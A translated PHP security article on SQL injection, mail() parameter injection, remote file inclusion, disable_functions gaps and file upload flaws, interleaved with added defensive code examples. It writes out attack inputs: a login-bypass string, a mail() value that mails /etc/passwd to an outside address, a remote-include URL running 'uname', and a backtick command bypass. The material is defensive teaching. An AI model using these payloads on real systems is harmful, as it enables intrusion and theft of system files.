PHP Security: A Humble Addendum

Shaun Clowes' article "Exploiting Common Vulnerabilities in PHP Applications" is well written and takes many aspects into account. This article is only a humble addendum to it, adding a few issues it does not mention. The focus here is on solving the problems, not on attacking.





1. The ancient trick of cheating SQL statements

In the default configuration, even if you forget to copy php.ini to /usr/local/lib/php.ini, PHP still runs with magic_quotes_gpc=on. So every single quote ('), double quote ("), backslash (\) and NUL byte (the null byte) in a GET/POST/cookie variable is prefixed with a backslash, and the database query executes correctly.


But PHP 4 RC2 introduced an optimized configuration file, php.ini-optimized, and in this optimized php.ini magic_quotes_gpc=off. Some administrators, seeing the word "optimized", may copy php.ini-optimized to /usr/local/lib/php.ini, and then things are more dangerous. Take a simple validation, and suppose the necessary characters are not filtered:

SELECT * FROM login WHERE user='$HTTP_POST_VARS[user]' AND pass='$HTTP_POST_VARS[pass]'

We can enter 1' or 1='1 in both the user box and the password box to pass the verification. This is a very antique method; the statement becomes:

SELECT * FROM login WHERE user='1' or 1='1' AND pass='1' or 1='1'

and it passes because of the or 1='1'.


The best countermeasure is to filter out all unnecessary characters, and additionally to pass every GET/POST/cookie variable that goes into SQL through a custom function:

function gpc2sql($str) {
    if (get_magic_quotes_gpc() == 1)
        return $str;
    else
        return addslashes($str);
}

Its main purpose is to let your program be ported safely to a variety of systems, whatever their magic_quotes_gpc setting.
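The following is an added example, not code from the original article: it reproduces the bypass above against an in-memory SQLite table and shows two ways of stopping it. It assumes the pdo_sqlite extension, which ships with PHP. Two details differ from the article because of SQLite rather than PHP: the payload uses '1'='1' instead of 1='1', since SQLite compares the integer 1 and the string '1' as unequal (MySQL does not), and the escaping step uses PDO::quote() instead of addslashes(), since addslashes() produces MySQL-style backslash escapes that SQLite does not understand. The prepared-statement variant goes beyond the article's addslashes() remedy.

```php
<?php
// Added example (not from the original article): the classic "or '1'='1"
// login bypass against an in-memory SQLite table, and two ways to stop it.
// Assumes the pdo_sqlite extension is available (it is bundled with PHP).

function setupDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec("CREATE TABLE login (user TEXT, pass TEXT)");
    // Constructed sample credential for the demonstration.
    $pdo->exec("INSERT INTO login VALUES ('alice', 'correct-horse')");
    return $pdo;
}

// The article's pattern: request variables interpolated straight into SQL.
function loginVulnerable(PDO $pdo, string $user, string $pass): bool {
    $sql = "SELECT * FROM login WHERE user='$user' AND pass='$pass'";
    return $pdo->query($sql)->fetch() !== false;
}

// The article's gpc2sql idea (escape before interpolating), but using the
// driver's own quoting so it is correct for this database.
function loginEscaped(PDO $pdo, string $user, string $pass): bool {
    $u = $pdo->quote($user);
    $p = $pdo->quote($pass);
    $sql = "SELECT * FROM login WHERE user=$u AND pass=$p";
    return $pdo->query($sql)->fetch() !== false;
}

// Parameterised query: the data never becomes part of the SQL text at all.
function loginPrepared(PDO $pdo, string $user, string $pass): bool {
    $stmt = $pdo->prepare("SELECT * FROM login WHERE user=? AND pass=?");
    $stmt->execute([$user, $pass]);
    return $stmt->fetch() !== false;
}

$pdo = setupDb();
$payload = "1' or '1'='1";   // constructed attacker input, typed in both boxes

var_dump(loginVulnerable($pdo, $payload, $payload));
var_dump(loginEscaped($pdo, $payload, $payload));
var_dump(loginPrepared($pdo, $payload, $payload));
var_dump(loginPrepared($pdo, 'alice', 'correct-horse'));
```

Run from the command line, the first call shows the interpolated query accepting the payload, the escaped and prepared variants reject it, and only the genuine credential pair is accepted. The practical caveat is the one the SQLite change makes visible: escaping functions are database-specific, so the portable answer is the prepared statement, not a better escaper.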





2. The fifth parameter of the mail function

In PHP 4.0.5 the mail function gained a fifth parameter for setting additional command-line arguments when the message is actually sent. But there is no proper check for special shell command characters, so there is a big command-execution problem. Take the example from the manual:

mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVER_NAME");

This is problematic: if $SERVER_NAME is ;mail san@xfocus.org </etc/passwd, the machine's password file is sent to my mailbox.

A reminder here: the PHP manual contains several examples with security issues. Do not copy them as they are into real code; they only demonstrate the basic function, and understanding them is enough.

For this problem in the mail function, the simplest remedy is not to use the fifth parameter at all. If you must use it, filter out illegal characters such as the semicolon (;). Another option is to modify the PHP source package, ext/standard/mail.c, adding the following line before if (extra_cmd != NULL):

extra_cmd = NULL;

and then recompile.
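As an added example (not the article's code and not PHP's own API), the validator below implements the "filter the illegal characters" remedy the other way round: rather than stripping ';' and hoping nothing else matters, it accepts only a sender address matching a strict mailbox pattern and otherwise drops the fifth parameter entirely. The function names and the hostile sample value are assumptions constructed for the demonstration.

```php
<?php
// Added example (not from the original article): build the fifth argument
// of mail() only from a sender address that passed an allowlist, so shell
// metacharacters such as ';', '<' and '`' can never reach the sendmail
// command line. Function names are assumptions.

function envelopeSenderArg(string $candidate): ?string {
    // Only an unambiguous mailbox syntax is accepted. Anything else,
    // including whitespace or punctuation that means something to /bin/sh,
    // is rejected outright instead of being "cleaned up".
    $pattern = '/^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/';
    if (!preg_match($pattern, $candidate)) {
        return null;
    }
    return '-f' . $candidate;
}

// Wrapper around mail(): when the sender cannot be validated the extra
// parameter is omitted rather than passed through tainted.
function sendNotice(string $to, string $subject, string $body, string $sender): bool {
    $extra = envelopeSenderArg($sender);
    if ($extra === null) {
        return mail($to, $subject, $body, 'From: webmaster@localhost');
    }
    return mail($to, $subject, $body, 'From: ' . $sender, $extra);
}

// Constructed inputs: a hostile value with a shell separator, and a normal one.
var_dump(envelopeSenderArg('webmaster@example.org; id'));
var_dump(envelopeSenderArg('webmaster@example.org'));
```

The first call returns null and the second returns the -f argument; a deployment that needs the fifth parameter should route every value through a check like this rather than through a blacklist of individual characters, because the set of characters the shell treats specially is larger than ';'.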





3. The UNIX version of the require and include functions

The require and include functions in the Windows version do not support HTTP and FTP remote files, whereas the UNIX version supports remote include files by default.

require and include pull the named file into the program as part of it, whatever extension the file has.

For modularity and portability we inevitably write programs with many require or include calls, and sometimes the parameter is a variable, for example include("$something");. If the user can control the $something parameter and it is not filtered, the result is miserable.

First, any file that the web user has read permission on can be viewed. Assuming this program is called http://victim/test.php, the URL http://victim/test.php?something=/etc/passwd shows the /etc/passwd file.

Commands can also be executed by using the remote-file feature. For example, I create a file test.php on www.xfocus.org with the following content (the content of that file is missing from this copy of the article):

Then I can use the following URL:

http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname

to run any command.

phpMyAdmin also has this problem, and we can use it to view any document we want. But before including, it uses the file_exists function to determine whether the file exists, and file_exists does not support remote files, so the second method above cannot be used directly. However, Apache logs can be used: request a URL containing PHP code, then point $something at the Apache log and the code is executed too, but Apache logs are usually large and too cluttered.

The approach in http://www.securereality.com.au/sradv00008.txt is more ingenious: upload the command-execution script as a local file upload, which creates a file with a name like php8ta02i in the server's upload temporary directory. Because the file exists at that moment, file_exists passes and the uploaded script can be included and executed.

So include and require must be used carefully, especially when the included file is given as a parameter, and that argument must never be left under the user's control. Support for remote files can also be removed by changing php.ini. Before PHP 4.0.3 this was the disable-url-fopen-wrapper option; later versions turn it off with allow_url_fopen = off.
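As an added example (not code from the article or from phpMyAdmin), here is the "argument must never be left under the user's control" rule applied to the include("$something") pattern above. The user supplies a page name, not a path; the name is looked up in a fixed table, and the resolved path is additionally confined to one directory with realpath(), which handles the /etc/passwd, remote-URL and upload-temp-file cases in one place. The directory name, table contents and GET parameter name are assumptions.

```php
<?php
// Added example (not from the original article): include a page chosen by
// the user without ever letting the user supply a path. Names below
// (PAGES_DIR, PAGE_TABLE, the "something" parameter) are assumptions.

const PAGES_DIR  = __DIR__ . '/pages';
const PAGE_TABLE = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Returns an absolute path inside PAGES_DIR, or null for anything else.
function resolvePage(string $name): ?string {
    if (!isset(PAGE_TABLE[$name])) {
        return null;                         // unknown name: nothing to include
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_TABLE[$name]);
    // realpath() returns false for missing files and collapses ".." and
    // symlinks, so a prefix check on its result is meaningful. A URL or a
    // path outside PAGES_DIR can never survive this check.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: the article's two attack shapes plus a valid name.
var_dump(resolvePage('/etc/passwd'));
var_dump(resolvePage('http://www.example.org/test.php?cmd=uname'));
var_dump(resolvePage('home'));   // non-null only if pages/home.php exists

// Request handling: the only thing the user chooses is a table key.
$name = $_GET['something'] ?? 'home';
$file = resolvePage(is_string($name) ? $name : '');
if ($file === null) {
    http_response_code(404);
    exit("no such page\n");
}
include $file;
```

The table lookup alone already blocks every value that is not a known key; the realpath() confinement is a second, independent layer so that a later edit to the table (a relative path, a symlink in the pages directory) cannot silently reopen the hole. allow_url_fopen = off in php.ini remains the server-wide backstop the article recommends.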





4. disable_functions

PHP 4.0.1 introduced a php.ini feature, disable_functions, which is useful and can be used to disable functions.

For example, after adding disable_functions = passthru, exec, system, popen to php.ini, calling these functions only prompts Warning: system() has been disabled for security reasons.

Alas, there is still a way to execute system commands. Because PHP borrows a lot from Perl, the backtick operator (`) can also execute commands:

<?php
$output = `ls -al`;
echo "<pre>$output</pre>";   // the HTML tags around the output were lost in extraction; <pre> assumed
?>

This can only be avoided with safe_mode, but the hateful safe_mode is so restrictive that doing other things becomes inconvenient.
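As an added example (not from the article), the script below audits a running PHP for the gap just described. On current PHP the backtick operator is implemented through shell_exec(), so listing shell_exec in disable_functions closes the `...` bypass without safe_mode; the audit reads disable_functions with ini_get() and reports which command-execution functions remain callable. Which functions count as dangerous is a deployment decision, so the list here is an assumption.

```php
<?php
// Added example (not from the original article): report which command
// execution functions are still callable under the current php.ini, and
// flag the backtick gap if shell_exec() is not in disable_functions.
// The $wanted list is an assumption about what a deployment wants blocked.

function disabledFunctions(): array {
    $raw = (string) ini_get('disable_functions');
    $names = array_map('trim', explode(',', $raw));
    return array_values(array_filter($names, 'strlen'));
}

// Returns [function name => true if blocked, false if still callable].
function execAudit(array $wanted): array {
    $disabled = array_map('strtolower', disabledFunctions());
    $report = [];
    foreach ($wanted as $fn) {
        $listed = in_array(strtolower($fn), $disabled, true);
        // Disabled functions are also absent from the function table, so
        // function_exists() gives a second, independent signal.
        $report[$fn] = $listed || !function_exists($fn);
    }
    return $report;
}

$wanted = ['system', 'exec', 'passthru', 'popen', 'shell_exec', 'proc_open'];
foreach (execAudit($wanted) as $fn => $blocked) {
    printf("%-10s %s\n", $fn, $blocked ? 'disabled' : 'STILL CALLABLE');
}
if (!execAudit(['shell_exec'])['shell_exec']) {
    echo "backtick operator still usable: add shell_exec to disable_functions\n";
}
```

Run it with the same php.ini the web server uses (php-cgi or php-fpm, not only the CLI, since each SAPI can load a different configuration); an entry reported as STILL CALLABLE is exactly the kind of leftover the article's passthru, exec, system, popen list had.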








5. File upload

The PHP file upload problem has been described very clearly in the article http://www.securereality.com.au/sradv00001.html. It really is a serious problem: the uploaded file is placed in the web directory, so it is easy for an attacker to obtain any document that the system's web user can read.

Fortunately, the is_uploaded_file and move_uploaded_file functions were provided after PHP 4.0.3. So in PHP 4.0.3 and above the upload part of a program must not use the copy function; use move_uploaded_file instead, which checks whether the file really is an uploaded file. For PHP 4.0.2 and below, it is recommended to add a function before the copy:

// Polyfill for PHP versions before 4.0.3, which lack is_uploaded_file().
if (!function_exists('is_uploaded_file')) {
    function is_uploaded_file($filename) {
        if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
            $tmp_file = dirname(tempnam('', ''));
        }
        $tmp_file .= '/' . basename($filename);
        /* User might have a trailing slash in php.ini ... */
        return (preg_replace('#/+#', '/', $tmp_file) == $filename);
    }
}



This loophole existed on SecurityFocus for a long time, but because there were many validation and judgement statements before the copy, exploiting it was quite difficult.
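As an added example (not the article's code), here is an upload handler built on the two functions the section recommends, for PHP 7 or later. It assumes a form field named "doc" and a storage directory outside the document root; both, and the allowed-type table, are assumptions.

```php
<?php
// Added example (not from the original article): an upload handler that
// uses is_uploaded_file()/move_uploaded_file() instead of copy(), stores
// outside the web root, and never trusts the client's file name or type.
// STORE_DIR, ALLOWED and the "doc" field name are assumptions.

const STORE_DIR = '/var/app/uploads';   // not under the document root
const ALLOWED   = ['pdf' => 'application/pdf', 'png' => 'image/png'];

// Returns the stored path, or null when the upload is rejected.
function storeUpload(array $file): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // 1. The temp path must be one PHP created for this request. A forged
    //    array pointing at /etc/passwd (the sradv00001 attack) fails here.
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 2. Allowlist the extension and confirm the MIME type from the bytes,
    //    never from the client-supplied $file['type'].
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        return null;
    }
    // 3. Server-generated name: the client's basename never reaches disk,
    //    so a ".php" upload cannot land under a name the web server runs.
    $dest = STORE_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // 4. move_uploaded_file() repeats the is_uploaded_file() check and moves
    //    the file out of upload_tmp_dir in one step, so the temp file is no
    //    longer there to be included by a later request.
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

if (isset($_FILES['doc'])) {
    $stored = storeUpload($_FILES['doc']);
    echo $stored === null ? "upload rejected\n" : "stored\n";
}
```

Moving the file out of the temporary directory and off the web root also addresses the php8ta02i trick from section 3: the uploaded content exists under a predictable name only between the request arriving and move_uploaded_file() returning, and it is never served or included from its final location.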








Also, do not use environment variables, cookie variables, session variables and the like as life-or-death judgment conditions, because these variables are far too easy to forge.

I have a lot on hand at the moment; other points will be added as I think of them, and other comrades are welcome to add and change freely.





References

1. PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)

2. A Study in Scarlet: Exploiting Common Vulnerabilities in PHP Applications (http://www.securereality.com.au/studyinscarlet.txt); a translation is available from analysist.

3. Remote Command Execution Vulnerabilities in phpMyAdmin and phpPgAdmin (http://www.securereality.com.au/sradv00008.txt)




